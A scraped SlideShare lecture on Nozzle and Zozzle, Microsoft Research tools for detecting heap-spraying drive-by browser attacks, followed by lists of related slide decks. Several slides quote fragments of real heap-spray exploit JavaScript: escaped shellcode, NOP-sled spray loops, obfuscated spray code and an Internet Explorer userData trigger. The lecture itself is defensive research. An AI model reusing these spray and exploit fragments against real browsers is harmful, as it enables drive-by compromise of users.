SlideShare ist ein Scribd-Unternehmen logo

20101017 program analysis_for_security_livshits_lecture04_nozzle

Als PPTX, PDF herunterladen
Computer Science Club
Computer Science Club
1 von 35
Finding Malware on a Web Scale Ben Livshits Microsoft Research Redmond, WA
Stack-based buffer overruns 1995 Heap-based buffer overruns 2002 Heap sprays 2005 Brief History of Memory-Based Exploits 2
Heap Spraying http://www.web2secure.com/2009/07/mozilla-firefox-35-heap-spray.html Firefox 3.5 July 14, 2009 3
<html> <body> <button id=’butid’ onclick=’trigger();’ style=’display:none’/> <script> // Shellcode var shellcode=unescape(‘%u9090%u9090%u9090%u9090%uceba%u11fa%u291f%ub1c9%udb33%ud9ce%u2474%u5ef4%u563 bigblock=unescape(‚%u0D0D%u0D0D‛); headersize=20;shellcodesize=headersize+shellcode.length; while(bigblock.length<shellcodesize){bigblock+=bigblock;} heapshell=bigblock.substring(0,shellcodesize); nopsled=bigblock.substring(0,bigblock.length-shellcodesize); while(nopsled.length+shellcodesize<0 25000){nopsled=nopsled+nopsled+heapshell} // Spray var spray=new Array(); for(i=0;i<500;i++){spray[i]=nopsled+shellcode;} // Trigger function trigger(){ var varbdy = document.createElement(‘body’); varbdy.addBehavior(‘#default#userData’); document.appendChild(varbdy); try { for (iter=0; iter<10; iter++) { varbdy.setAttribute(‘s’,window); } } catch(e){ } window.status+=‛; } document.getElementById(‘butid’).onclick(); </script> </body> </html> 4
Historical Digression 5
Research to Reality in 15 Short Months От идеи до продукта May 2009 – October 2010 6
Heap Sprays • Targets web users through the browser • Focus on prevention • Wanted it to run in the browser May 2009 8
Challenges • False positives • False negatives • Performance overhead June 2009 9
August -- March 2009 Nozzle • Combination of runtime and static analysis • Low false positives • Low false negatives • 5-15% overhead • Paper in UsenixSec ‘09 10
5-15% is too high April 2009 • Browser landscape is very competitive performance-wise 11
Offline Scanning • Help from Bing • Finds malware on the January 2010 web • Can scan a large number of URLs 12
October 2010 13
End of Historical Digression 14
Drive-By Heap Spraying 0wned! 15
Drive-By Heap Spraying (2) ASLR prevents the Program Heap attack ok bad PC Creates the ok malicious object <HTML> <SCRIPT language="text/javascript"> Triggers the jump shellcode = unescape("%u4343%u4343%...''); </SCRIPT> <IFRAME SRC=file://BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB … NAME="CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC … &#3341;&#3341;"> </IFRAME> </HTML> 16
Drive-By Heap Spraying (3) Program Heap ok bad bad bad bad bad ok bad <SCRIPT language="text/javascript"> shellcode = unescape("%u4343%u4343%...''); oneblock = unescape("%u0C0C%u0C0C"); Allocate 1,000s of var fullblock = oneblock; while (fullblock.length<0x40000) { malicious objects fullblock += fullblock; } sprayContainer = new Array(); for (i=0; i<1000; i++) { sprayContainer[i] = fullblock + shellcode; } </SCRIPT> 17
Nozzle: Runtime Heap Spraying Detection Normalized attack surface (NAS) good bad 18
Local Malicious Object Detection Is this object dangerous? Code or Data? 000000000000 add [eax], al • Is this object code? 000000000000 add [eax], al – Code and data look the same on x86 000000000000 add [eax], al 000000000000 NOP add [eax], al • Focus on sled detection 000000000000 add [eax], al 000000000000 add [eax], al – Majority of object is sled 000000000000 sled add [eax], al – Spraying scripts build simple sleds • Is this code a NOP sled? 0101010101 and ah, [edx] – Previous techniques do not look at heap 0101010101 and ah, [edx] 0101010101 and ah, [edx] – Many heap objects look like NOP sleds 0101010101 and ah, [edx] – 80% false positive rates using previous 0101010101 shellcode and ah, [edx] 0101010101 and ah, [edx] techniques 0101010101 and ah, [edx] • Need stronger local techniques 19
Object Surface Area Calculation (1) • Assume: attacker wants to reach shell code from jump to any point in object • Goal: find blocks that are likely to be reached via control flow • Strategy: use dataflow analysis to compute “surface area” of each block An example object from visiting google.com 20
Object Surface Area Calculation (2) 4 4 12 • Each block starts with its own size as weight • Weights are propagated forward with flow 2 6 12 • Invalid blocks don’t propagate 4 10 12 39 15 • Iterate until a fixpoint is reached 2 12 12 • Compute block with highest weight 2 14 14 An example object from visiting google.com 21
Nozzle Global Heap Metric Normalize to (approx): P(jump will cause exploit) NSA(H) obj build CFG Legend: sub [eax], eax arithmatic adc dh, bh memory or eax, 0d172004h SA(H) Bi I/O or syscall in eax, 0x11 control flow test cl, ah jecxz 021c7fd8 Compute threat add [eax], al add [ecx], 0 add al, 30h add al, 80h outs dx, [esi] add al, 38h of entire heap jecxz 021c7fde xor [eax], eax To target block imul eax, [eax], 6ch dataflow or eax, 0d179004h SA(o) SA(Bi) Compute threat of Compute threat of single block single object 22
Nozzle Experimental Summary 0 False Positives • 10 popular AJAX-heavy sites • 150 top Web sites 0 False Negatives • 12 published heap spraying exploits and • 2,000 synthetic rogue pages generated using Metasploit Runtime Overhead • As high as 2x without sampling • 5-10% with sampling 23
Nozzle Runtime Overhead 24
10% overhead 25
What do we do with all this data? 26
Obfuscation eval(""+O(2369522)+O(1949494)+O eval(l(79)+l(61)+l(102)+l(117)+ OlOlll="(x)"; var l = function(x) { (2288625)+O(648464)+O(2304124)+ l(110)+l(99)+l(116)+l(105)+l(11 OllOlO=" String"; return String.fromCharCode(x); O(2080995)+O(2020710)+O(2164958 1)+l(110)+l(40)+l(109)+l(41)+l( OlllOO="tion"; } )+O(2168902)+O(1986377)+O(22279 123)+l(114)+l(101)+l(116)+l(117 OlOllO="Code(x)}"; 03)+O(2005851)+O(2021303)+O(646 )+l(114)+l(110)+l(32)+l(83)+l(1 var O = function(m){ OllOOO="Char"; return String.fromCharCode( 435)+O(1228455)+O(644519)+O(234 16)+l(114)+l(105)+l(110)+l(103) OlllOl="func"; Math.floor(m / 10000) / 2); 6826)+O(2207788)+O(2023127)+O(2 +l(46)+l(102)+l(114)+l(111)+l(1 } OllllO=" l = "; 306806)+O(1983560)+O(1949296)+O 09)+l(67)+l(104)+l(97)+l(114)+l OllOOl=".from"; (2245968)+O(2028685)+O(809214)+ (67)+l(111)+l(100)+l(101)+l(40) shellcode = unescape("%u54EB%u758B…"); OllOll="{return"; O(680960)+O(747602)+O(2346412)+ +l(77)+l(97)+l(116)+l(104)+l(46 var bigblock = unescape("%u0c0c%u0c0c"); Olllll="var"; O(1060647)+O(1045327)+O(1381007 )+l(102)+l(108)+l(111)+l(111)+l while(bigblock.length<slackspace) { eval(Olllll+OllllO+OlllOl+OlllO )+O(1329180)+O(745897)+O(234140 (114)+l(40)+l(109)+l(47)+l(49)+ bigblock += bigblock; O+OlOlll+OllOll+OllOlO+OllOOl+O 4)+O(1109791)+O(1064283)+O(1128 l(48)+l(48)+l(48)+l(48)+l(41)+l } llOOO+OlOllO); block = bigblock.substring(0, 719)+O(1321055)+O(748985)+...); (47)+l(50)+l(41)+l(59)+l(125)); bigblock.length-slackspace); while(block.length+slackspace<0x40000) { block = block + block + fillblock; } memory = new Array(); for(x=0; x<300; x++) { memory[x] = block + shellcode; 27 …
Drive By Detection • Nozzle Visit a page and let it run • • for new processesZozzle WatchObserve the page as it runs • Handle infection a heapcode before it runs • Watch for the spray • Examine – Detect•inWhen suspect code is found • Kill the script before the a VM – Run vulnerability is triggered antivirus – Terminate the page OR – Enable other detection var she var spray for(i=0; mechanisms memory[ document. 28
Detection Techniques Drive By Detection Nozzle Zozzle Certainty Performance Timeliness of Detection Hit Rate 29
10% 15% 20% 25% 30% 35% 0% 5% MAL003 29.7% MAL004 29.7% Unique Exploits Discovered MAL036 9.7% 0 2 4 6 8 12 14 16 18 10 0 MAL033 7.7% MAL035 3.9% MAL032 3.2% 20 MAL039 2.6% MAL001 1.9% 40 MAL006 1.9% MAL031 1.9% 60 MAL034 1.9% MAL011 1.3% MAL037 1.3% 80 MAL040 1.3% Most attacks look like this Malicious URLs Examined MAL005 0.6% 100 MAL009 0.6% MAL038 0.6% 120 We don’t find many new attacks Can We Detect Attacks Statically? 140 30
shellcode = unescape("%u54EB%u758B…"); Deobfuscation var bigblock = unescape("%u0c0c%u0c0c"); while(bigblock.length<slackspace) { bigblock += bigblock; Hierarchical Feature Extraction } block = bigblock.substring(0, bigblock.length-slackspace); Naïve Bayes Classification eval(""+O(2369522)+O(19494 while(block.length+slackspace<0x40000) { } block = block + block + fillblock; 94)+O(2288625)+O(648464)+O (2304124)+O(2080995)+O(202 memory = function new Array(); 0710)+O(2164958)+O(2168902 Feature )+O(1986377)+O(2227903)+O( P(malicious) 2005851)+O(2021303)+O(6464 35)+O(1228455)+O(644519)+O string:0c0c (2346826)+O(2207788)+O(202 0.99 Deobfuscator 3127)+O(2306806)+O(1983560 = function:shellcode )+O(1949296)+O(2245968)+O( 0.99 loop 2028685)+O(809214)+O(68096 function:shellcode JavaScript loop:memory 0)+O(747602)+O(2346412)+O( 0.87 Runtime 1060647)+O(1045327)+O(1381 007)+O(1329180)+O(745897)+ abcabcabcabcabc O(2341404)+O(1109791)+O(10 0.80 64283)+O(1128719)+O(132105 = shellcode string loop:memory try:activex 5)+O(748985)+...); 0.41 string:%u0c0c%u0909… * P(malicious) loop:block if:msie 7 0.33 abcabcabcabcabcabc 0.21 %u0c0c%u0909… memory block function:unescape 0.45 abcabcabcabcabcabc 0.55 loop:nop 0.95 31
The Zozzle Ecosystem Server Side (Microsoft) Browser Side Classifier Classifier Classifier Classifier 32
Feature Selection False Positives False Negatives 25% 25% 20% 20% Classifier False Negative Rate Classifier False Positive Rate 15% 15% 10% 10% 5% 5% 0% 0% 0% 5% 10% 15% 0% 5% 10% 15% Training Set Size Training Set Size Hand-Picked Automatic Hand-Picked Automatic 33
Comparison of Detection Methods 34
shellcode = unescape("%u9090%u9090%u54EB%u758B%u8B3C%u3574%u0378%u56F5%u768B%u0320%u33F5%u49C9…"); var memory = []; var spraySize = "548864" - shellcode.length * "2"; var nop = unescape("%u0c0c%u0c0c"); while (nop.length < spraySize / "2") { nop += nop; } var nops = nop.substring("0", spraySize / "2"); Zozzle can automatically delete nop; for(i = "0"; i < "270"; i++) { identify components of an } memory[i] = nops + nops + shellcode; function payload() attack. { var body = document.createElement("BODY"); body.addBehavior("#default#userData"); document.appendChild(body); try { for(i = "0"; i < "10"; i++) { body.setAttribute("s", window); } } catch(e) { Shellcode } window.status += ""; } Spray document.getElementById("bo").onclick(); Vulnerability 35
Summary Heap spraying attacks are • Easy to implement, easy to retarget • In widespread use Nozzle • Effectively detects published attacks (known and new) • Has acceptable runtime overhead • Can be used both online and offline Zozzle is a static detection solution • Fast and scalable • Accurate and powerful 36

Empfohlen

NoSQL and JavaScript: a love story
NoSQL and JavaScript: a love storyNoSQL and JavaScript: a love story
NoSQL and JavaScript: a love storyAlexandre Morgaut
 
State of the art - server side JavaScript - web-5 2012
State of the art - server side JavaScript - web-5 2012State of the art - server side JavaScript - web-5 2012
State of the art - server side JavaScript - web-5 2012Alexandre Morgaut
 
Do we need Unsafe in Java?
Do we need Unsafe in Java?Do we need Unsafe in Java?
Do we need Unsafe in Java?Andrei Pangin
 
Intravert Server side processing for Cassandra
Intravert Server side processing for CassandraIntravert Server side processing for Cassandra
Intravert Server side processing for CassandraEdward Capriolo
 
Everything you wanted to know about Stack Traces and Heap Dumps
Everything you wanted to know about Stack Traces and Heap DumpsEverything you wanted to know about Stack Traces and Heap Dumps
Everything you wanted to know about Stack Traces and Heap DumpsAndrei Pangin
 
Conf soat tests_unitaires_Mockito_jUnit_170113
Conf soat tests_unitaires_Mockito_jUnit_170113Conf soat tests_unitaires_Mockito_jUnit_170113
Conf soat tests_unitaires_Mockito_jUnit_170113SOAT
 
Reutov, yunusov, nagibin random numbers take ii
Reutov, yunusov, nagibin random numbers take iiReutov, yunusov, nagibin random numbers take ii
Reutov, yunusov, nagibin random numbers take iiDefconRussia
 
Writing native bindings to node.js in C++
Writing native bindings to node.js in C++Writing native bindings to node.js in C++
Writing native bindings to node.js in C++nsm.nikhil
 

Empfohlen

NoSQL and JavaScript: a love story
NoSQL and JavaScript: a love storyNoSQL and JavaScript: a love story
NoSQL and JavaScript: a love storyAlexandre Morgaut
 
State of the art - server side JavaScript - web-5 2012
State of the art - server side JavaScript - web-5 2012State of the art - server side JavaScript - web-5 2012
State of the art - server side JavaScript - web-5 2012Alexandre Morgaut
 
Do we need Unsafe in Java?
Do we need Unsafe in Java?Do we need Unsafe in Java?
Do we need Unsafe in Java?Andrei Pangin
 
Intravert Server side processing for Cassandra
Intravert Server side processing for CassandraIntravert Server side processing for Cassandra
Intravert Server side processing for CassandraEdward Capriolo
 
Everything you wanted to know about Stack Traces and Heap Dumps
Everything you wanted to know about Stack Traces and Heap DumpsEverything you wanted to know about Stack Traces and Heap Dumps
Everything you wanted to know about Stack Traces and Heap DumpsAndrei Pangin
 
Conf soat tests_unitaires_Mockito_jUnit_170113
Conf soat tests_unitaires_Mockito_jUnit_170113Conf soat tests_unitaires_Mockito_jUnit_170113
Conf soat tests_unitaires_Mockito_jUnit_170113SOAT
 
Reutov, yunusov, nagibin random numbers take ii
Reutov, yunusov, nagibin random numbers take iiReutov, yunusov, nagibin random numbers take ii
Reutov, yunusov, nagibin random numbers take iiDefconRussia
 
Writing native bindings to node.js in C++
Writing native bindings to node.js in C++Writing native bindings to node.js in C++
Writing native bindings to node.js in C++nsm.nikhil
 
The Ring programming language version 1.8 book - Part 105 of 202
The Ring programming language version 1.8 book - Part 105 of 202The Ring programming language version 1.8 book - Part 105 of 202
The Ring programming language version 1.8 book - Part 105 of 202Mahmoud Samir Fayed
 
Advanced Dynamic Analysis for Leak Detection (Apple Internship 2008)
Advanced Dynamic Analysis for Leak Detection (Apple Internship 2008)Advanced Dynamic Analysis for Leak Detection (Apple Internship 2008)
Advanced Dynamic Analysis for Leak Detection (Apple Internship 2008)James Clause
 
Tests unitaires mock_kesako_20130516
Tests unitaires mock_kesako_20130516Tests unitaires mock_kesako_20130516
Tests unitaires mock_kesako_20130516SOAT
 
Node.js/io.js Native C++ Addons
Node.js/io.js Native C++ AddonsNode.js/io.js Native C++ Addons
Node.js/io.js Native C++ AddonsChris Barber
 
JS Fest 2019. Thomas Watson. Post-Mortem Debugging in Node.js
JS Fest 2019. Thomas Watson. Post-Mortem Debugging in Node.jsJS Fest 2019. Thomas Watson. Post-Mortem Debugging in Node.js
JS Fest 2019. Thomas Watson. Post-Mortem Debugging in Node.jsJSFestUA
 
Csw2016 gawlik bypassing_differentdefenseschemes
Csw2016 gawlik bypassing_differentdefenseschemesCsw2016 gawlik bypassing_differentdefenseschemes
Csw2016 gawlik bypassing_differentdefenseschemesCanSecWest
 
Implementing New Web
Implementing New WebImplementing New Web
Implementing New WebJulian Viereck
 
Node.js extensions in C++
Node.js extensions in C++Node.js extensions in C++
Node.js extensions in C++Kenneth Geisshirt
 
Concept of BlockChain & Decentralized Application
Concept of BlockChain & Decentralized ApplicationConcept of BlockChain & Decentralized Application
Concept of BlockChain & Decentralized ApplicationSeiji Takahashi
 
Cassandra Summit EU 2014 - Testing Cassandra Applications
Cassandra Summit EU 2014 - Testing Cassandra ApplicationsCassandra Summit EU 2014 - Testing Cassandra Applications
Cassandra Summit EU 2014 - Testing Cassandra ApplicationsChristopher Batey
 
Sandboxie process isolation with kernel hooks
Sandboxie process isolation with kernel hooksSandboxie process isolation with kernel hooks
Sandboxie process isolation with kernel hooksKarlFrank99
 
Performance #1: Memory
Performance #1: MemoryPerformance #1: Memory
Performance #1: MemoryYonatan Levin
 
Design Patterns Reconsidered
Design Patterns ReconsideredDesign Patterns Reconsidered
Design Patterns ReconsideredAlex Miller
 
Locks (Concurrency)
Locks (Concurrency)Locks (Concurrency)
Locks (Concurrency)Sri Prasanna
 
From C++ to Objective-C
From C++ to Objective-CFrom C++ to Objective-C
From C++ to Objective-Ccorehard_by
 
Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS VectorsRodolfo Assis (Brute)
 
MongoDB: Optimising for Performance, Scale & Analytics
MongoDB: Optimising for Performance, Scale & AnalyticsMongoDB: Optimising for Performance, Scale & Analytics
MongoDB: Optimising for Performance, Scale & AnalyticsServer Density
 
Node 관계형 데이터베이스_바인딩
Node 관계형 데이터베이스_바인딩Node 관계형 데이터베이스_바인딩
Node 관계형 데이터베이스_바인딩HyeonSeok Choi
 
Cassandra is great but how do I test my application?
Cassandra is great but how do I test my application?Cassandra is great but how do I test my application?
Cassandra is great but how do I test my application?Christopher Batey
 
20111015 inroduction to_combinatorics_on_words_frid_lecture01
20111015 inroduction to_combinatorics_on_words_frid_lecture0120111015 inroduction to_combinatorics_on_words_frid_lecture01
20111015 inroduction to_combinatorics_on_words_frid_lecture01Computer Science Club
 
20111023 computer graphics_galinsky_lecture06_curves
20111023 computer graphics_galinsky_lecture06_curves20111023 computer graphics_galinsky_lecture06_curves
20111023 computer graphics_galinsky_lecture06_curvesComputer Science Club
 
20111202 machine learning_nikolenko_lecture08
20111202 machine learning_nikolenko_lecture0820111202 machine learning_nikolenko_lecture08
20111202 machine learning_nikolenko_lecture08Computer Science Club
 

Weitere ähnliche Inhalte

Was ist angesagt?

The Ring programming language version 1.8 book - Part 105 of 202
The Ring programming language version 1.8 book - Part 105 of 202The Ring programming language version 1.8 book - Part 105 of 202
The Ring programming language version 1.8 book - Part 105 of 202Mahmoud Samir Fayed
 
Advanced Dynamic Analysis for Leak Detection (Apple Internship 2008)
Advanced Dynamic Analysis for Leak Detection (Apple Internship 2008)Advanced Dynamic Analysis for Leak Detection (Apple Internship 2008)
Advanced Dynamic Analysis for Leak Detection (Apple Internship 2008)James Clause
 
Tests unitaires mock_kesako_20130516
Tests unitaires mock_kesako_20130516Tests unitaires mock_kesako_20130516
Tests unitaires mock_kesako_20130516SOAT
 
Node.js/io.js Native C++ Addons
Node.js/io.js Native C++ AddonsNode.js/io.js Native C++ Addons
Node.js/io.js Native C++ AddonsChris Barber
 
JS Fest 2019. Thomas Watson. Post-Mortem Debugging in Node.js
JS Fest 2019. Thomas Watson. Post-Mortem Debugging in Node.jsJS Fest 2019. Thomas Watson. Post-Mortem Debugging in Node.js
JS Fest 2019. Thomas Watson. Post-Mortem Debugging in Node.jsJSFestUA
 
Csw2016 gawlik bypassing_differentdefenseschemes
Csw2016 gawlik bypassing_differentdefenseschemesCsw2016 gawlik bypassing_differentdefenseschemes
Csw2016 gawlik bypassing_differentdefenseschemesCanSecWest
 
Concept of BlockChain & Decentralized Application
Concept of BlockChain & Decentralized ApplicationConcept of BlockChain & Decentralized Application
Concept of BlockChain & Decentralized ApplicationSeiji Takahashi
 
Cassandra Summit EU 2014 - Testing Cassandra Applications
Cassandra Summit EU 2014 - Testing Cassandra ApplicationsCassandra Summit EU 2014 - Testing Cassandra Applications
Cassandra Summit EU 2014 - Testing Cassandra ApplicationsChristopher Batey
 
Sandboxie process isolation with kernel hooks
Sandboxie process isolation with kernel hooksSandboxie process isolation with kernel hooks
Sandboxie process isolation with kernel hooksKarlFrank99
 
Performance #1: Memory
Performance #1: MemoryPerformance #1: Memory
Performance #1: MemoryYonatan Levin
 
Design Patterns Reconsidered
Design Patterns ReconsideredDesign Patterns Reconsidered
Design Patterns ReconsideredAlex Miller
 
Locks (Concurrency)
Locks (Concurrency)Locks (Concurrency)
Locks (Concurrency)Sri Prasanna
 
From C++ to Objective-C
From C++ to Objective-CFrom C++ to Objective-C
From C++ to Objective-Ccorehard_by
 
MongoDB: Optimising for Performance, Scale & Analytics
MongoDB: Optimising for Performance, Scale & AnalyticsMongoDB: Optimising for Performance, Scale & Analytics
MongoDB: Optimising for Performance, Scale & AnalyticsServer Density
 
Node 관계형 데이터베이스_바인딩
Node 관계형 데이터베이스_바인딩Node 관계형 데이터베이스_바인딩
Node 관계형 데이터베이스_바인딩HyeonSeok Choi
 
Cassandra is great but how do I test my application?
Cassandra is great but how do I test my application?Cassandra is great but how do I test my application?
Cassandra is great but how do I test my application?Christopher Batey
 

Was ist angesagt? (19)

The Ring programming language version 1.8 book - Part 105 of 202
The Ring programming language version 1.8 book - Part 105 of 202The Ring programming language version 1.8 book - Part 105 of 202
The Ring programming language version 1.8 book - Part 105 of 202
 
Advanced Dynamic Analysis for Leak Detection (Apple Internship 2008)
Advanced Dynamic Analysis for Leak Detection (Apple Internship 2008)Advanced Dynamic Analysis for Leak Detection (Apple Internship 2008)
Advanced Dynamic Analysis for Leak Detection (Apple Internship 2008)
 
Tests unitaires mock_kesako_20130516
Tests unitaires mock_kesako_20130516Tests unitaires mock_kesako_20130516
Tests unitaires mock_kesako_20130516
 
Node.js/io.js Native C++ Addons
Node.js/io.js Native C++ AddonsNode.js/io.js Native C++ Addons
Node.js/io.js Native C++ Addons
 
JS Fest 2019. Thomas Watson. Post-Mortem Debugging in Node.js
JS Fest 2019. Thomas Watson. Post-Mortem Debugging in Node.jsJS Fest 2019. Thomas Watson. Post-Mortem Debugging in Node.js
JS Fest 2019. Thomas Watson. Post-Mortem Debugging in Node.js
 
Csw2016 gawlik bypassing_differentdefenseschemes
Csw2016 gawlik bypassing_differentdefenseschemesCsw2016 gawlik bypassing_differentdefenseschemes
Csw2016 gawlik bypassing_differentdefenseschemes
 
Implementing New Web
Implementing New WebImplementing New Web
Implementing New Web
 
Node.js extensions in C++
Node.js extensions in C++Node.js extensions in C++
Node.js extensions in C++
 
Concept of BlockChain & Decentralized Application
Concept of BlockChain & Decentralized ApplicationConcept of BlockChain & Decentralized Application
Concept of BlockChain & Decentralized Application
 
Cassandra Summit EU 2014 - Testing Cassandra Applications
Cassandra Summit EU 2014 - Testing Cassandra ApplicationsCassandra Summit EU 2014 - Testing Cassandra Applications
Cassandra Summit EU 2014 - Testing Cassandra Applications
 
Sandboxie process isolation with kernel hooks
Sandboxie process isolation with kernel hooksSandboxie process isolation with kernel hooks
Sandboxie process isolation with kernel hooks
 
Performance #1: Memory
Performance #1: MemoryPerformance #1: Memory
Performance #1: Memory
 
Design Patterns Reconsidered
Design Patterns ReconsideredDesign Patterns Reconsidered
Design Patterns Reconsidered
 
Locks (Concurrency)
Locks (Concurrency)Locks (Concurrency)
Locks (Concurrency)
 
From C++ to Objective-C
From C++ to Objective-CFrom C++ to Objective-C
From C++ to Objective-C
 
Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS Vectors
 
MongoDB: Optimising for Performance, Scale & Analytics
MongoDB: Optimising for Performance, Scale & AnalyticsMongoDB: Optimising for Performance, Scale & Analytics
MongoDB: Optimising for Performance, Scale & Analytics
 
Node 관계형 데이터베이스_바인딩
Node 관계형 데이터베이스_바인딩Node 관계형 데이터베이스_바인딩
Node 관계형 데이터베이스_바인딩
 
Cassandra is great but how do I test my application?
Cassandra is great but how do I test my application?Cassandra is great but how do I test my application?
Cassandra is great but how do I test my application?
 

Andere mochten auch

20111015 inroduction to_combinatorics_on_words_frid_lecture01
20111015 inroduction to_combinatorics_on_words_frid_lecture0120111015 inroduction to_combinatorics_on_words_frid_lecture01
20111015 inroduction to_combinatorics_on_words_frid_lecture01Computer Science Club
 
20111023 computer graphics_galinsky_lecture06_curves
20111023 computer graphics_galinsky_lecture06_curves20111023 computer graphics_galinsky_lecture06_curves
20111023 computer graphics_galinsky_lecture06_curvesComputer Science Club
 
20111202 machine learning_nikolenko_lecture08
20111202 machine learning_nikolenko_lecture0820111202 machine learning_nikolenko_lecture08
20111202 machine learning_nikolenko_lecture08Computer Science Club
 
20111202 machine learning_nikolenko_lecture05
20111202 machine learning_nikolenko_lecture0520111202 machine learning_nikolenko_lecture05
20111202 machine learning_nikolenko_lecture05Computer Science Club
 
20110925 circuit complexity_seminar_lecture01_kulikov
20110925 circuit complexity_seminar_lecture01_kulikov20110925 circuit complexity_seminar_lecture01_kulikov
20110925 circuit complexity_seminar_lecture01_kulikovComputer Science Club
 
20080502 software verification_sharygina_lecture03
20080502 software verification_sharygina_lecture0320080502 software verification_sharygina_lecture03
20080502 software verification_sharygina_lecture03Computer Science Club
 
20080502 software verification_sharygina_lecture04
20080502 software verification_sharygina_lecture0420080502 software verification_sharygina_lecture04
20080502 software verification_sharygina_lecture04Computer Science Club
 
20101017 program analysis_for_security_livshits_lecture03_security
20101017 program analysis_for_security_livshits_lecture03_security20101017 program analysis_for_security_livshits_lecture03_security
20101017 program analysis_for_security_livshits_lecture03_securityComputer Science Club
 
20091129 algorithmsfornphardproblems kulikov_lecture10
20091129 algorithmsfornphardproblems kulikov_lecture1020091129 algorithmsfornphardproblems kulikov_lecture10
20091129 algorithmsfornphardproblems kulikov_lecture10Computer Science Club
 
20091101 algorithmsfornphardproblems kulikov_lecture06
20091101 algorithmsfornphardproblems kulikov_lecture0620091101 algorithmsfornphardproblems kulikov_lecture06
20091101 algorithmsfornphardproblems kulikov_lecture06Computer Science Club
 
20100314 virtualization igotti_lecture07
20100314 virtualization igotti_lecture0720100314 virtualization igotti_lecture07
20100314 virtualization igotti_lecture07Computer Science Club
 
20100307 virtualization igotti_lecture04
20100307 virtualization igotti_lecture0420100307 virtualization igotti_lecture04
20100307 virtualization igotti_lecture04Computer Science Club
 
20080302 cryptography hirsch_lecture03
20080302 cryptography hirsch_lecture0320080302 cryptography hirsch_lecture03
20080302 cryptography hirsch_lecture03Computer Science Club
 
20090315 hardnessvsrandomness itsykson_lecture03
20090315 hardnessvsrandomness itsykson_lecture0320090315 hardnessvsrandomness itsykson_lecture03
20090315 hardnessvsrandomness itsykson_lecture03Computer Science Club
 
20120415 videorecognition konushin_lecture05
20120415 videorecognition konushin_lecture0520120415 videorecognition konushin_lecture05
20120415 videorecognition konushin_lecture05Computer Science Club
 
20110306 systems of_typed_lambda_calculi_moskvin_lecture04
20110306 systems of_typed_lambda_calculi_moskvin_lecture0420110306 systems of_typed_lambda_calculi_moskvin_lecture04
20110306 systems of_typed_lambda_calculi_moskvin_lecture04Computer Science Club
 
20110409 quantum algorithms_vyali_lecture07
20110409 quantum algorithms_vyali_lecture0720110409 quantum algorithms_vyali_lecture07
20110409 quantum algorithms_vyali_lecture07Computer Science Club
 

Andere mochten auch (19)

20111015 inroduction to_combinatorics_on_words_frid_lecture01
20111015 inroduction to_combinatorics_on_words_frid_lecture0120111015 inroduction to_combinatorics_on_words_frid_lecture01
20111015 inroduction to_combinatorics_on_words_frid_lecture01
 
20111023 computer graphics_galinsky_lecture06_curves
20111023 computer graphics_galinsky_lecture06_curves20111023 computer graphics_galinsky_lecture06_curves
20111023 computer graphics_galinsky_lecture06_curves
 
20111202 machine learning_nikolenko_lecture08
20111202 machine learning_nikolenko_lecture0820111202 machine learning_nikolenko_lecture08
20111202 machine learning_nikolenko_lecture08
 
Slides2
Slides2Slides2
Slides2
 
20111202 machine learning_nikolenko_lecture05
20111202 machine learning_nikolenko_lecture0520111202 machine learning_nikolenko_lecture05
20111202 machine learning_nikolenko_lecture05
 
20110925 circuit complexity_seminar_lecture01_kulikov
20110925 circuit complexity_seminar_lecture01_kulikov20110925 circuit complexity_seminar_lecture01_kulikov
20110925 circuit complexity_seminar_lecture01_kulikov
 
20080502 software verification_sharygina_lecture03
20080502 software verification_sharygina_lecture0320080502 software verification_sharygina_lecture03
20080502 software verification_sharygina_lecture03
 
20080502 software verification_sharygina_lecture04
20080502 software verification_sharygina_lecture0420080502 software verification_sharygina_lecture04
20080502 software verification_sharygina_lecture04
 
20101003 ontology konev_lecture09
20101003 ontology konev_lecture0920101003 ontology konev_lecture09
20101003 ontology konev_lecture09
 
20101017 program analysis_for_security_livshits_lecture03_security
20101017 program analysis_for_security_livshits_lecture03_security20101017 program analysis_for_security_livshits_lecture03_security
20101017 program analysis_for_security_livshits_lecture03_security
 
20091129 algorithmsfornphardproblems kulikov_lecture10
20091129 algorithmsfornphardproblems kulikov_lecture1020091129 algorithmsfornphardproblems kulikov_lecture10
20091129 algorithmsfornphardproblems kulikov_lecture10
 
20091101 algorithmsfornphardproblems kulikov_lecture06
20091101 algorithmsfornphardproblems kulikov_lecture0620091101 algorithmsfornphardproblems kulikov_lecture06
20091101 algorithmsfornphardproblems kulikov_lecture06
 
20100314 virtualization igotti_lecture07
20100314 virtualization igotti_lecture0720100314 virtualization igotti_lecture07
20100314 virtualization igotti_lecture07
 
20100307 virtualization igotti_lecture04
20100307 virtualization igotti_lecture0420100307 virtualization igotti_lecture04
20100307 virtualization igotti_lecture04
 
20080302 cryptography hirsch_lecture03
20080302 cryptography hirsch_lecture0320080302 cryptography hirsch_lecture03
20080302 cryptography hirsch_lecture03
 
20090315 hardnessvsrandomness itsykson_lecture03
20090315 hardnessvsrandomness itsykson_lecture0320090315 hardnessvsrandomness itsykson_lecture03
20090315 hardnessvsrandomness itsykson_lecture03
 
20120415 videorecognition konushin_lecture05
20120415 videorecognition konushin_lecture0520120415 videorecognition konushin_lecture05
20120415 videorecognition konushin_lecture05
 
20110306 systems of_typed_lambda_calculi_moskvin_lecture04
20110306 systems of_typed_lambda_calculi_moskvin_lecture0420110306 systems of_typed_lambda_calculi_moskvin_lecture04
20110306 systems of_typed_lambda_calculi_moskvin_lecture04
 
20110409 quantum algorithms_vyali_lecture07
20110409 quantum algorithms_vyali_lecture0720110409 quantum algorithms_vyali_lecture07
20110409 quantum algorithms_vyali_lecture07
 

Ähnlich wie 20101017 program analysis_for_security_livshits_lecture04_nozzle

Hacking WebApps for fun and profit : how to approach a target?
Hacking WebApps for fun and profit : how to approach a target?Hacking WebApps for fun and profit : how to approach a target?
Hacking WebApps for fun and profit : how to approach a target?Yassine Aboukir
 
Nozzle: A Defense Against Heap-spraying Code Injection Attacks
Nozzle: A Defense Against Heap-spraying Code Injection AttacksNozzle: A Defense Against Heap-spraying Code Injection Attacks
Nozzle: A Defense Against Heap-spraying Code Injection Attacksguest101353
 
DEF CON 27 - WENXIANG QIAN and YUXIANG LI HUIYU - breaking google home exploi...
